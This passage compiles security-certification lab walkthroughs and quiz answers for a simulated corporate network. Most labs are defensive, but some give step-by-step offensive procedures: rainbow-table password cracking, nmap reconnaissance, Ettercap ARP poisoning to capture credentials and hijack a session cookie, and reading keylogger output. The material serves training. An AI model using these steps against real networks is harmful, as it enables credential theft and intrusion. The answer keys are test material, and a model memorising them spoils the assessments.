   d. Select Next.
5. Configure a session timeout constraint.
   a. Under Constraints, select Session Timeout.
   b. Select Disconnect after the following maximum session time.
   c. Set the timeout session time to 30 minutes.
6. Configure a day and time restriction constraint.
   a. Under Constraints, select Day and Time restrictions.
   b. Select Allow access only on these days and at these times.
   c. Select Edit.
   d. Modify the settings to allow access only from 6:00 a.m. to 9:00 p.m., Monday-Friday.
   e. Select OK and then select Next.
   f. From the Configure Settings dialog (RADIUS Attributes), select Next.
   g. Select Finish.
7. Under Policy Name, make sure that the Sales policy is at the top of the list.

An attacker sends forged Address Resolution Protocol Reply packets over a LAN to a target machine. These packets include an IP address that matches the gateway's IP address but retains its own MAC address. The target machine then sends all traffic to the attacker's machine, believing it is the gateway. Which type of attack just happened?

ARP poisoning

You are the security analyst for a small corporate network. Part of your role is to ensure secure access to the company website. You want to verify that the passwords being used meet the company's requirements. To do this, you captured some password hashes in a file named captured_hashes.txt and saved it in the /root directory. You want to use a rainbow table to analyze the passwords captured in this hash file to see if they meet the company's website requirements. The password requirements for your website are as follows:
- The password must be eight or more characters in length.
- The password must include at least one upper and one lowercase letter.
- The password must have at least one of these special characters: !, ", #, $, %, &, _, ', *, or @
- All passwords are encrypted using an md5 or sha1 hash algorithm.
In this lab, your task is to:
- Determine which rainbowcrack charset includes all the characters required for your company's website password requirements.
- Create md5 and sha1 rainbow tables using rtgen.
- Sort the rainbow tables using rtsort.
- Analyze the passwords using rcrack.
- Answer the questions.

1. Determine which rainbowcrack charset includes all the characters required for your company's password requirements.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type cat /usr/share/rainbowcrack/charset.txt
   c. Press Enter.
   d. In the top right, select Answer Questions.
   e. Answer Question 1.
2. Create and sort an md5 and sha1 rainbow crack table.
   a. At the prompt, type rtgen md5 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create an md5 rainbow crack table.
   b. Type rtgen sha1 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a sha1 rainbow crack table.
   c. Type rtsort . and press Enter to sort the rainbow tables.
3. Analyze the passwords using rcrack.
   a. Type rcrack . -l /root/captured_hashes.txt and press Enter to crack the passwords contained in the hash file.
   b. Answer Questions 2-5.
   c. Select Score Lab.

You are the security analyst working for CorpNet. You are trying to see if you can discover weaknesses in your network. From outside of the CorpNet network, you found that the web server (www.corpnet.xyz) has an IP address of 198.28.1.1. To test for weaknesses, you decide to perform several nmap scans using a few http scripts. In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1 and answer the applicable questions:

1. Display the HTTP server header.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type nmap --script=http-server-header -p80 198.28.1.1 and press Enter to run the script.
   c. From the top right, select Answer Questions.
   d. Answer Question 1.
2. Measure the time a website takes to deliver its web pages.
   a. Type nmap --script=http-chrono -p80 198.28.1.1 and press Enter to run the script.
   b. Answer Question 2.
3. Perform a HEAD request for the root folder and crawl through the website to look for error pages.
   a. Type nmap --script=http-headers -p80 198.28.1.1 and press Enter to run the script.
   b. Type nmap --script=http-errors -p80 198.28.1.1 and press Enter to run the script.
   c. Under Lab Questions, answer Question 3.
4. Look for malware signatures of known server compromises.
   a. Type nmap --script=http-malware-host -p80 198.28.1.1 and press Enter to run the script.
   b. Answer Question 4.
5. Display HTML and JavaScript comments.
   a. Type nmap --script=http-comments-displayer -p80 198.28.1.1 and press Enter to run the script.
   b. Answer Question 5.
   c. Select Score Lab.
1- Microsoft-IIS 10.0 2- 3.14ms 3- 3 4- No 5- <!--Google Analytics Code-->

You are the security analyst for a small corporate network. While working on your Linux server, you have determined that you need to enable and disable a few services. In this lab, your task is to: Use the systemctl command to enable anaconda.service. Use the systemctl command to disable vmtoolsd.service. After each command, check the service status with the systemctl is-enabled command.

1. Enable the Anaconda service.
   a. At the prompt, type systemctl enable anaconda.service and then press Enter.
   b. Type systemctl is-enabled anaconda.service and then press Enter to check the service's status.
2. Disable the VMware tools service.
   a. Type systemctl disable vmtoolsd.service and press Enter.
   b. Type systemctl is-enabled vmtoolsd.service and press Enter to check the service's status.

You are the security analyst for a small corporate network. You have had problems with users installing remote access services like Remote Desktop Services and VNC Server. You need to find, stop, and disable these services on all computers running them. In this lab, your task is to:
- Use Zenmap to run a scan on the 192.168.0.0/24 network to look for the following open ports:
  - Port 3389 - Remote Desktop Services (TermServices)
  - Port 5900 - VNC Server (vncserver)
- Answer Questions 1 and 2.
- Disable and stop the services for the open ports found running on the applicable computers. Use the following table to identify the computers:

1. For the computers that have a remote access service port open, disable and then stop the applicable service from running.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Select the computer with the remote access service port open. OFFICE 2 AND ITADMIN
   c. In the search field on the taskbar, type Services.
   d. Under Best Match, select Services.
   e. Double-click the service (Remote Desktop Services or VNC Server) that needs to be stopped.
      OFFICE2: Remote Desktop Service disabled, Remote Desktop Service stopped
      ITADMIN: VNC disabled, VNC stopped
   f. Using the Startup Type drop-down, select Disabled.
   g. Under Service status, select Stop.
   h. Select OK.
   i. Repeat steps a-h for the other computer.
   j. In the top right, select Answer Questions.
   k. Select Score Lab.
ANSWERS: 1- 192.168.0.34 2- 192.168.0.31

You are the security analyst for a growing corporate network. You manage the certification authority for your network. As part of your daily routine, you perform several certificate management tasks. CorpCA, the certification authority, is a guest server on CorpServer2. Your network uses smart cards to control access to sensitive computers. Currently, the approval process dictates that you manually approve smart card certificate requests. In this lab, your task is to complete the following: Approve the pending certificate request for a smart card certificate from mlopez. Deny the pending web server certificate request for CorpSrv16. User bnguyen lost his smartcard. Revoke the certificate assigned to bnguyen.CorpNet.com using the Key Compromise reason code. User tsutton has left his company. Revoke the certificate assigned to tsutton.CorpNet.com using the Change of Affiliation reason code. Unrevoke the CorpDev2 certificate.

1. From CorpCA, access Certification Authority.
   a. From Hyper-V Manager, select CORPSERVER2.
   b. Maximize the window for easier viewing.
   c. From the Virtual Machines pane, double-click CorpCA.
   d. From Server Manager's menu bar, select Tools > Certification Authority.
   e. Maximize the window for easier viewing.
   f. From the left pane, expand CorpCA-CA.
2. Approve the pending smart card certificate request for mlopez.
   a. Select Pending Requests.
   b. From the right pane, scroll to the Request Common Name column.
   c. Right-click mlopez and select All Tasks > Issue to approve the certificate.
3. Deny the pending smart card certificate request for CorpSrv16.
   a. Right-click CorpSrv16.CorpNet.com and select All Tasks > Deny.
   b. Select Yes.
4. Revoke bnguyen's and tsutton's certificates.
   a. From the left pane, select Issued Certificates.
   b. From the right pane, right-click bnguyen.CorpNet.com and select All Tasks > Revoke Certificate.
   c. Using the Reason code drop-down, select Key Compromise.
   d. Select Yes.
   e. Right-click tsutton and select All Tasks > Revoke Certificate.
   f. Using the Reason code drop-down, select Change of Affiliation.
   g. Select Yes.
5. Unrevoke the CorpDev2 certificate.
   a. From the left pane, select Revoked Certificates.
   b. From the right pane, right-click CorpDev2.CorpNet.com and select All Tasks > Unrevoke Certificate.

Which type of processor chip is designed to perform a single function and is typically custom-designed?

ASIC

What does a router use to protect a network from attacks and to control which types of communications are allowed on a network?

Access control list

You are the security analyst for a small corporate network. You have heard complaints that the CorpServer (192.168.0.10) seems to be very unresponsive. You suspect the server may be under a SYN attack. In this lab, your task is to:
- Use Zenmap to find which ports on CorpServer (192.168.0.10) are open.
- Use Wireshark and the enp2s0 network interface to determine if the CorpServer is under a SYN attack.
- Analyze the packets captured.
- Answer the questions.

1. From Zenmap, use nmap to find the open ports used on CorpServer.
   a. From the Favorites bar, select Zenmap.
   b. In the Command field, type nmap -p 0-100 192.168.0.10
   c. Select Scan.
   d. In the top right, select Answer Questions.
   e. Answer Question 1.
   f. Minimize the Lab Question dialog.
   g. Close Zenmap.
2. Capture SYN packets on the CorpServer machine.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1
   d. Press Enter.
   e. Select the blue fin to begin a Wireshark capture.
   f. Capture packets for a few seconds.
   g. From Wireshark, select the red box to stop the Wireshark capture.
1- 5
2- All SYN packets have the same source IP address; the time between SYN packets is very short.
3- 21, 22, 23, 25
4- 00:60:98:7f:41:e0

You work as a security analyst for a small corporation. Your manager has asked you to check the external servers of a potential partner's company for potentially vulnerable ports. The company hosts an external web server at www.partnercorp.xyz. In this lab, your task is to perform reconnaissance on the PartnerCorp external servers to find potentially vulnerable ports as follows:
- On Analyst-Lap:
  - Use the whois.org website to determine the domain name servers used by PartnerCorp.xyz. Answer question 1.
  - Use nslookup to determine the primary web server address. Answer question 2.
- On Analyst-Lap2:
  - Use Zenmap to search for 50 of the top ports opened on the network identified by nslookup above. Answer question 3.

1. From the Analyst-Lap computer, find the domain name servers used by partnercorp.xyz.
   a. From the taskbar, select Google Chrome.
   b. Maximize the window for better viewing.
   c. In the URL field, type whois.org and press Enter.
   d. In the Search for a domain name field, enter partnercorp.xyz.
   e. Select Search.
   f. In the top right, select Answer Questions.
   g. Answer Question 1.
2. Use Zenmap to run an Nmap command to scan for open ports.
   a. From the navigation tabs, select Buildings.
   b. Under Blue Cell, select Analyst-Lap2.
   c. From the Favorites bar, select Zenmap.
   d. Maximize Zenmap for easier viewing.
   e. In the Command field, use nmap --top-ports 50 73.44.215.0/24 to scan for open ports.
   f. Select Scan to scan for open ports on all servers located on this network.
   g. In the top right, select Answer Questions.
   h. Answer Question 3.
   i. Select Score Lab.
ANSWERS: 1- ns1.nethost.net 2- 73.44.215.1 3- 73.44.215.5

You are the security analyst for a small corporate network. You suspect that one of the computers in your company is connecting to a rogue access point (AP). You need to find the name of the hidden rogue AP so it can be deauthorized. The computer suspected of using the rogue access point is Gst-Lap. In this lab, your task is to complete the following:
- On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode.
- Use airodump-ng to find the hidden access point. Answer the question.
- From the Gst-Lap computer, connect to the rogue AP using the SSID of BookStore.

1. From the IT-Laptop, configure the wlp1s0 card to run in monitor mode.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type airmon-ng and press Enter to find the name of the wireless adapter.
   c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode.
   d. Type airmon-ng and press Enter to view the new name of the wireless adapter.
2. Use airodump-ng to discover and isolate the hidden access point.
   a. Type airodump-ng wlp1s0mon and press Enter to discover all of the access points.
   b. Press Ctrl + c to stop airodump-ng.
   c. Find the hidden access point ESSID.
   d. In the top right, select Answer Questions.
   e. Answer the question.
   f. In Terminal, type airodump-ng wlp1s0mon --bssid 00:00:1B:45:21:11 and press Enter to isolate the hidden access point.
3. Switch to the Gst-Lap and connect to the Wi-Fi network.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Executive Office, select Gst-Lap.
   c. From the notification area, select the Wi-Fi network icon.
   d. Select Hidden Network.
   e. Select Connect.
   f. In the Enter the name (SSID) for the network field, type BookStore. In a real environment, you'll only need to wait until the employee connects to the rogue access point again.
   g. Select Next.
   h. Select Yes. Wait for the connection to be made.
   i. Under Lab Questions, select Score Lab.
1- 00:00:1b:45:21:11

You are the security analyst for a small corporate network. You are concerned that your company's employee portal has a weak configuration that could allow web sessions to be hijacked. To verify whether the authentication to this portal can be broken, you have decided to see if you can hijack a web session to the employee portal. In this lab, your task is to attempt to hijack a web session as follows:
- On IT-Laptop:
  - Use the terminal to find the IP addresses for Office1 and the default gateway.
  - Use Ettercap to sniff traffic (unified) between Office1 and the gateway using the enp2s0 interface.
  - Initiate a man-in-the-middle (on-path) attack to capture the session ID for the employee portal logon.
- On Office1, use Google Chrome to log in to the employee portal using the following information:
  - Site: rmksupplies.com
  - Username: sramirez
  - Password: mickeyminniegoofypluto
- On IT-Laptop, copy the session cookie detected in Ettercap.
- On Office2, use Google Chrome to access rmksupplies.com. Use the Google Chrome cookie editor plug-in to inject the session ID cookie copied. Test to see if you can hijack the session.

1. Get the IP address and route for Office1.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type host office1 and press Enter to get the IP address of Office1.
   c. Type route and press Enter to get the gateway address.
2. Use Ettercap to sniff traffic between Office1 and the gateway.
   a. From the Favorites bar, select Ettercap.
   b. From the Ettercap menu, select Sniff > Unified sniffing.
   c. From the Network Interface drop-down list, select enp2s0.
   d. Select OK.
   e. Select Hosts > Scan for hosts.
   f. Select Hosts > Host list to display a list of the hosts found.
   g. Under IP Address, select the gateway's IP address and then select Add to Target 1. 192.168.0.5
   h. Select Office1's IP address and then select Add to Target 2. 192.168.0.33
3. Initiate a man-in-the-middle (on-path) attack.
   a. Select Mitm > ARP poisoning.
   b. Select Sniff remote connections and then select OK. You are ready to capture traffic.
4. From Office1, log in to the employee portal on rmksupplies.com.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Office 1, select Office1.
   c. From the taskbar, select Google Chrome.
   d. Maximize the window for easier viewing.
   e. In the URL field, enter rmksupplies.com and then press Enter.
   f. Scroll to the bottom of the page and then select Employee Portal.
   g. In the Username field, enter sramirez.
   h. In the Password field, enter mickeyminniegoofypluto.
   i. Select Login. You are logged into the employee portal as Sophia Ramirez.
5. From the IT-Laptop computer, copy the session ID detected in Ettercap.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select IT-Laptop.
   c. In the bottom pane of the Ettercap console, find sramirez's username, password, and session cookie (.login) captured in Ettercap.
   d. Highlight the session cookie ID (just the number).
   e. Press Ctrl + C to copy.
6. On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Office 2, select Office2.
   c. From the taskbar, select Google Chrome.
   d. Maximize the window for easier viewing.
   e. In Chrome's URL field, enter rmksupplies.com. Do not copy the above address from the scenario. If you do, you will lose the captured session ID.
   f. Press Enter.
   g. In the top right corner, select the cookie icon to open the cookie editor.
   h. From the menu bar, select the plus + sign to add a new session cookie.
   i. In the Name field, enter .login
   j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap.
   k. Make sure rmksupplies.com is in the Domain field.
   l. Select the green check mark to save the cookie.
   m. Click outside the cookie editor to close the editor.
7. At the bottom of the rmksupplies page, select Employee Portal. You are now on Sophia Ramirez's web session without being asked for a username or password.

You are a cybersecurity consultant for a small corporate office. The employee in Office1 is suspected of using their work computer in some sort of criminal operation. You have made an image of the hard drive on that computer and you would like to use Autopsy to analyze the contents of the hard drive. In this lab, your task is to analyze an Office1 disk image with Autopsy by doing the following:
- Create a case file.
  - Case Name: corpnet-case132 (no spaces)
  - Base Directory: d:\autopsy
  - Case Number: 132
  - Examiner: enter your name, number, and email
- Import the disk image.
  - Disk image file: e:\office1_hd.vhd
  - Ingest Modules: Recent Activity, Hash Lookup, File Type Identification, EXIF Parser, and Keyword Search
- Analyze the disk image.
  - Under Data Sources, analyze the Users folder on vol2. Answer Question 1.
  - Under Views, analyze the File Types and the File Size. Answer Questions 2 and 3.
  - Under Results, analyze the Extracted Content and the Keyword Hits. Answer Questions 4-6.

1. In Autopsy, create a case file.
   a. Select Start and then select Autopsy.
   b. From the Welcome dialog, select New Case.
   c. In the Case Name field, enter corpnet-case132 (no spaces).
   d. Select Browse and then from the left pane, expand and select Forensic (D) > autopsy as the Base Directory.
   e. Select Folder.
   f. Select Next.
   g. Under Case, enter the number 132.
   h. Under Examiner, enter your name, phone number, and email address.
   i. Select Finish.
2. Import the disk image.
   a. Under Select Type of Data Source to Add, make sure Disk Image or VM File is checked and then select Next.
   b. For Path, select Browse and then expand and select Data (E:).
   c. From the right pane, select office1_hd.vhd as the disk image file and then select Open.
   d. Select Next.
   e. Under Configure Ingest Modules, select Deselect All.
   f. Select:
      - Recent Activity
      - Hash Lookup
      - File Type Identification
      - EXIF Parser
      - Keyword Search
   g. Select Next.
   h. Select Finish and wait for the disk to finish analyzing.
1- David 2- Dognapping 3- Dogs 4- dogwonder.com, dog-pharmacy.com, dogclaw-db.com 5- [email protected] 6- Rover.com, DogGoneIt.com

You are the security analyst for a small corporate network. To protect your Bluetooth devices from attacks, you want to discover which Bluetooth devices are running in your company and gather information about each of them. In this lab, your task is to use the Terminal to: Use hciconfig to discover and enable the onboard Bluetooth adapter. Use hcitool to find all of the Bluetooth devices. Answer Question 1. Use l2ping to determine if the Bluetooth device is alive and within range. Answer Question 2. Use sdptool to query Francisco's laptop to determine the Bluetooth services available on the device. Answer Question 3. Use hcitool to determine the clock offset and class for Brian's Braven Speaker device. Answer Question 4.

1. Initialize the Bluetooth adapter.
  a. From the Favorites bar, select Terminal.
  b. At the prompt, type hciconfig and press Enter to view the onboard Bluetooth adapter.
  c. Type hciconfig hci0 up and press Enter to initialize the adapter.
  d. Type hciconfig and press Enter to verify that the adapter is up and running.
2. Find all Bluetooth devices within range.
  a. Type hcitool scan and press Enter to view the detected Bluetooth devices and their MAC addresses.
  b. In the top left, select Answer Questions.
  c. Answer Question 1.
3. Determine if the Bluetooth devices found are in range.
  a. Type l2ping MAC_address and press Enter to determine if the Bluetooth device is in range.
  b. Press Ctrl + c to stop the ping process.
4. Find details for Francisco's laptop using sdptool.
  a. Type sdptool browse AF:52:23:92:EF:AF and press Enter to view the details for Francisco's laptop.
  b. Answer Question 3.
5. Find details for Brian's Echo Show using hcitool.
  a. Type hcitool inq and press Enter to determine the clock offset and class for each device.
  b. Answer Question 4.
  c. Select Score Lab.
1- 6 2- 6 3- Ad Hoc User Service, Device ID Service Record 4- 0x248080

Based on your review of physical security, you have recommended several improvements. Your plan includes smart card readers, IP cameras, signs, and access logs. Implement your physical security plan by dragging the correct items from the shelf into the various locations in the building. As you drag the items from the shelf, the possible drop locations are highlighted. In this lab, your task is to: Install the smart card key readers in the appropriate locations to control access to key infrastructure. Install the IP security cameras in the appropriate locations to record which employees access the key infrastructure. Install a Restricted Access sign in the appropriate location to control access to the key infrastructure. Add the visitor log to a location appropriate for logging visitor access.

1. Install the smart card key readers.
  a. From the Shelf, expand Door Locks.
  b. Drag a Smart Card Reader from the shelf to the highlighted location outside the building's front door.
  c. Drag a Smart Card Reader from the shelf to the highlighted location outside the Networking Closet's door.
2. Install the IP security cameras.
  a. From the Shelf, expand CCTV Cameras.
  b. Drag the IP Security Camera from the shelf to the highlighted circle inside the Networking Closet.
  c. Drag the IP Security Camera from the shelf to just outside the Networking Closet.
3. Install the Restricted Access sign.
  a. From the Shelf, expand Restricted Access Signs.
  b. Drag the Restricted Access Sign from the shelf to the Networking Closet door.
4. Install the visitor log.
  a. On the Shelf, expand Visitor Logs.
  b. Drag the Visitor Log from the shelf to the Lobby desk.

You are the security analyst for the CorpNet.xyz company. A senior IT network administrator, Oliver Lennon, is suspected of wrongdoing and thinks he is in danger of being fired from the company. To help hide his actions, Oliver has changed many standard passwords that are only known to the top executives, and now he is the only person that knows these passwords. To protect the company from being locked out in the event of Oliver's dismissal, another top executive has allowed you to install a keylogger device on the ITAdmin computer, which Oliver uses. You hope you can use this method to capture the changed passwords. It has been a week since the keylogger device was installed, and the company executive has let you back into the IT Admin's office after hours. In this lab, your task is to: Move the keylogger to your laptop without inhibiting the functionality of the ITAdmin computer. From your laptop, use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode. Using the LOG.txt file created by the keylogger, inspect the contents. Answer the questions.

1. Move the keylogger from the ITAdmin computer to a USB port on the Analyst-Lap laptop.
  a. From the Workspace, above the computer, select Back.
  b. On the back of the computer, drag the USB Type A connector for the keyboard/keylogger to another USB port on the computer. This gives you access to the keylogger.
  c. From the Shelf, expand System Cases.
  d. Drag the laptop to the Workspace.
  e. Above the laptop, select Back.
  f. From the computer, drag the keylogger to a USB port on the laptop.
1- P@ssw0rd 2- 4Lm87Qde

You are the security analyst for a small corporate network. The receptionist, Maggie Brown, uses an iPad to manage employee schedules and messages. You need to help her make the iPad more secure. The current simple passcode for her iPad is 3141. In this lab, your task is to:
Set a secure passcode on the iPad as follows:
  Require a passcode: After 5 minutes
  New passcode: youwontguessthisone
Turn simple passcodes off.
Configure the iPad to erase data after 10 failed passcode attempts.

1. On the iPad, set Require Passcode for 5 minutes.
  a. Select Settings.
  b. From the left menu, select Touch ID & Passcode.
  c. Enter 3141 for the passcode.
  d. From the right pane, select Require Passcode.
  e. Select After 5 minutes.
2. Turn off simple passcodes.
  a. At the top, select Passcode Lock.
  b. Next to Simple Passcode, slide the switch to turn off simple passcodes.
  c. Enter 3141 for the passcode.
  d. Enter youwontguessthisone as the new passcode and then select Next.
  e. Enter youwontguessthisone to re-enter the new passcode and then select Done.
3. Configure the iPad to erase data after 10 failed passcode attempts.
  a. From the Touch ID & Passcode page, next to Erase Data, slide the switch to enable Erase Data.
  b. Select Enable.

You are the security analyst for your company. Your manager is concerned about the vulnerability of the company's database server, which contains the finance and accounting systems. He wants you to perform a port scan on the server (192.168.0.22) to identify all the open ports. In this lab, your task is to: Use nmap to perform a port scan on the database server to determine if any ports are open. Answer the question.

1. Scan the company's database server for open ports.
  a. From the Favorites bar, select Terminal.
  b. At the prompt, type nmap -p- 192.168.0.22.
  c. Press Enter.
2. Answer the question.
  a. In the top right, select Answer Questions.
  b. Answer the question.
  c. Select Score Lab.
Answer 4

An attacker has made their way into an organization's network and run an LDAP enumeration tool. What is the attacker MOST likely accessing and extracting information from?

Active Directory

Which cybersecurity approach seeks to asymmetrically put the odds in the security analyst's favor by using maneuverability of sensitive data, honeypots, and anti-malware programs?

Active defense approach

You are the Security Analyst for a small corporate network. The company has a single Active Directory domain named CorpNet.xyz. You need to increase the domain's authentication security. You need to make sure that User Account Control (UAC) settings are consistent throughout the domain and in accordance with industry recommendations. In this lab, your task is to configure the following UAC settings in the Default Domain Policy on CorpDC:

1. Open Group Policy Management on CorpDC.
  a. From Hyper-V Manager, select CORPSERVER.
  b. Double-click CorpDC to open the virtual machine.
  c. From Server Manager, select Tools > Group Policy Management.
  d. Maximize the window for better viewing.
2. Open the Default Domain Policy for editing.
  a. Expand Forest: CorpNet.local > Domains > CorpNet.local.
  b. Right-click Default Domain Policy and select Edit.
  c. Maximize the window for easier viewing.
3. In Security Options, edit the User Account Control policies.
  a. Under Computer Configuration, expand Policies.
  b. Expand Windows Settings > Security Settings > Local Policies.
  c. Select Security Options.
  d. In the right pane, right-click the policy you want to edit and select Properties.
  e. Select Define this policy setting.
  f. Select Enable or Disable as necessary.
  g. Edit the value for the policy as needed and then select OK.
  h. Repeat steps 3d-3g for each policy setting.

You are the security analyst for a small corporate network. To ensure that your Linux computers meet the current company security standards, you have decided to conduct a vulnerability scan. In this lab, your task is to complete the following:
From the ITAdmin computer, use the Security Evaluator to check the security:
  On the Linux computer with the IP address of 192.168.0.22
  On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69
Answer the questions.

1. Run a Security Evaluator report for 192.168.0.22.
  a. From the taskbar, select Security Evaluator.
  b. Next to Local Machine, select the target icon to select a new target.
  c. Select IPv4 Address.
  d. Enter 192.168.0.22.
  e. Select OK.
  f. Next to Status, select the Run/Rerun Security Evaluation icon to run the security evaluation.
  g. Review the results.
  h. In the top right, select Answer Questions.
  i. Answer Question 1.
2. Run a Security Evaluator report for the IP address range of 192.168.0.60 through 192.168.0.69.
  a. From the Security Evaluator, select the target icon to select a new target.
  b. Select IPv4 Range.
  c. In the left field, type 192.168.0.60.
  d. In the right field, type 192.168.0.69.
  e. Select OK.
  f. Next to Status, select the Run/Rerun Security Evaluation icon to run the security evaluation.
  g. Review the results.
  h. Answer Questions 2 and 3.
  i. Select Score Lab.
1- root - Password Does Not Expire 2- 192.168.0.65, 192.168.0.68 3- backup - Password Does Not Expire

You are the security analyst for a small corporate network. You are concerned that there are some IoT devices on the corporate network that may not be in compliance with the current security standards. You have decided to use the Security Evaluator to help you determine whether there are any IoT devices on your network and whether they have issues that need attention. In this lab, your task is to: Scan all devices using an IP address in the range of 192.168.200.50 through 192.168.200.100. Answer the questions.

1. Run a Security Evaluator report for 192.168.200.50 through 192.168.200.100.
  a. From the taskbar, select Security Evaluator.
  b. From the Security Evaluator, select the Target icon to select a new target.
  c. Select IPv4 Range.
  d. In the left field, type 192.168.200.50 as the beginning IP address.
  e. In the right field, type 192.168.200.100 as the ending IP address.
  f. Select OK.
  g. Next to Status, select the Run/Rerun Security Evaluation icon to run a security evaluation.
  h. Answer Questions.
  i. Select Score Lab.
1- Wireless Thermostat 2- Video Conference System 3- 192.168.200.54, 192.168.200.66

You are the security analyst for a small corporate network. You have decided to check to see if the computer used by the primary administrator, Ava, meets the current security policies. Ava is the only person authorized to perform local administrative actions. The company network security policy requires that Windows Firewall be enabled on all workstations and that complex passwords are used for all users. Sharing personal files is not allowed. The requirements for a complex password are 12 characters or more and 3 of the following:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
  A special character that isn't a number, letter, or whitespace
In this lab, your task is to complete the following:
On ITAdmin, use the Security Evaluator (found on the taskbar) to run a vulnerability scan.
On Office2, remediate all vulnerabilities that didn't pass as shown in the vulnerability report.
On ITAdmin, re-run a vulnerability scan to make sure all of the issues are resolved.

1. Run a Security Evaluator report.
  a. From the taskbar, select Security Evaluator.
  b. Next to Local Machine, select the Target icon to select a new target.
  c. Select Workstation.
  d. Using the Workstation drop-down menu, select Office2 as the target.
  e. Select OK.
  f. Next to Status, select the Run/Rerun Security Evaluation icon to run the security evaluation.
  g. Review the results to determine which issues you need to resolve on Office2.
2. Access Computer Management from the Office2 computer.
  a. From the top navigation tabs, select Floor 1.
  b. Under Office2, select Office2.
  c. From Office2, right-click Start and select Computer Management.
3. Rename the Administrator user account.
  a. Expand Local Users and Groups.
  b. Select Users.
  c. Right-click Administrator and select Rename.
  d. Enter a new name of your choice and press Enter.
4. Unlock Charlotte's account and remove her from the Administrators group.
  a. Right-click Charlotte and select Properties.
  b. Deselect Account is locked out and then click Apply.
  c. Select the Member of tab.
  d. Select Administrators.
  e. Select Remove.
  f. Select OK.
5. Disable the Guest account.
  a. Right-click Guest and select Properties.
  b. Select Account is disabled and then select OK.
6. Set a new password for Ava.
  a. Right-click Ava and select Set Password.
  b. Select Proceed.
  c. Enter a new password of your choice. It must contain:
    - 12 characters or more.
    - At least one upper and one lowercase letter.
    - At least one number.
  d. Confirm the new password and then select OK.
  e. Select OK to close the confirmation dialog.
  Ideally, you should have created a policy that requires passwords with 12 characters or more.
7. Configure Ava's password to expire and to change her password at the next logon.
  a. Right-click Ava and select Properties.
  b. Deselect Password never expires.
  c. Select User must change password at next logon and then select OK.
  d. Close the Computer Management window.
8. Enable Windows Firewall for all profiles.
  a. Right-click Start and then select Settings.
  b. Select Network & Internet.
  c. From the right pane, scroll down and select Windows Firewall.
  d. Under Domain network, select Turn on.
  e. Under Private network, select Turn on.
  f. Under Public network, select Turn on.
  g. Close the Windows Security and Settings windows.
9. Remove the file share from the MyMovies folder.
  a. From the taskbar, select File Explorer.
  b. Browse to C:\MyMovies.
  c. Right-click MyMovies and select Properties.
  d. Select the Sharing tab.
  e. Select Advanced Sharing.
  f. Deselect Share this folder.
  g. Select OK to close the Advanced Sharing window.
  h. Select OK to close the MyMovies Properties window.
10. Use the Security Evaluator feature to verify that all of the issues on the Office2 computer were resolved.
  a. From the top navigation tabs, select Floor 1.
  b. Select ITAdmin.
  c. In Security Evaluator, select Status refresh to re-run the security evaluation.
  d. If you still see unresolved issues, select Floor 1, navigate to the Office2 workstation and remediate any remaining issues.

You are the security analyst for a small corporate network. You are concerned that hackers may be performing port scanning on the network, hoping to find open ports that could leave the company vulnerable to attacks. In this lab, your task is to use Nmap to detect open ports as follows:
Scan the computers in Bldg A using 192.168.0.0/24 for the network address.
Scan the computers in Bldg B using 192.168.10.0/24 for the network address.
Scan the company's public facing web servers using 198.28.1.0/24 for the network address.
Answer the questions.

1. Scan for open ports on 192.168.0.0, 192.168.10.0 and 198.28.1.0.
  a. From the Favorites bar, select Terminal.
  b. At the prompt, type nmap -p- 192.168.0.0/24 and press Enter.
  c. Type nmap -p- 192.168.10.0/24 and press Enter.
  d. Type nmap -p- 198.28.1.0/24 and press Enter.
2. Answer the questions.
  a. In the top right, select Answer Questions.
  b. Answer the questions.
  c. Select Score Lab.
1- Domain Controller, DNS 2- 198.28.1.1, 198.28.1.2, 198.28.1.3, 198.28.1.15 3- 198.28.1.15

You are the security analyst for a small corporate network. You want to ensure that your local network is free from potential vulnerabilities. You have decided to get a list of the operating systems running on your network and to see if any folders are shared. In this lab, your task is to complete the following:
From the IT-Laptop, use Zenmap to determine the operating system of the hosts on your network. The network address is: 192.168.0.0/24. Answer Question 1.
From ITAdmin and Windows PowerShell (Admin):
  Use net view to check for shared folders on the CorpFiles and CorpFiles16 servers.
  Map the H: drive to the shared folder found on CorpFiles.
  View the files in the shared folder on the CorpFiles server.
Answer Question 2.

1. Scan for operating systems on the network.
  a. From the Favorites bar, select Zenmap.
  b. In the Command field, type nmap -O 192.168.0.0/24.
  c. Select Scan to scan the local subnet.
2. View the shared folders on CorpFiles and CorpFiles16.
  a. From the top navigation tabs, select Floor 1 Overview.
  b. Under IT Administration, select ITAdmin.
  c. Right-click Start and select Windows PowerShell (Admin).
  d. At the prompt, type net view corpfiles and press Enter.
  e. Type net view corpfiles16 and press Enter.
3. Map the H: drive to the Confidential folder on CorpFiles.
  a. Type net use h: \\corpfiles\finances and press Enter.
  b. Type h: and press Enter to change to the H: drive.
4. View the files in the Financial Records folder.
  a. Type dir and press Enter to view the folders available on the drive.
  b. Type cd Financial Records and press Enter.
  c. Type dir and press Enter to view the financial records.
  d. Answer Question 2.
  e. Select Score Lab.
1- 192.168.0.22, 192.168.0.46, 192.168.0.47, 192.168.0.48 2- Bank Accounts.xlsx

You are the security analyst for a small corporate network. To be more proactive in your defense against possible attacks, you want to save the system logs being captured by the pfSense firewall. In this lab, your task is to:
Sign in to pfSense using:
  Username: admin
  Password: P@ssw0rd (zero)
Configure the general system logs to:
  Only show 25 logs at a time.
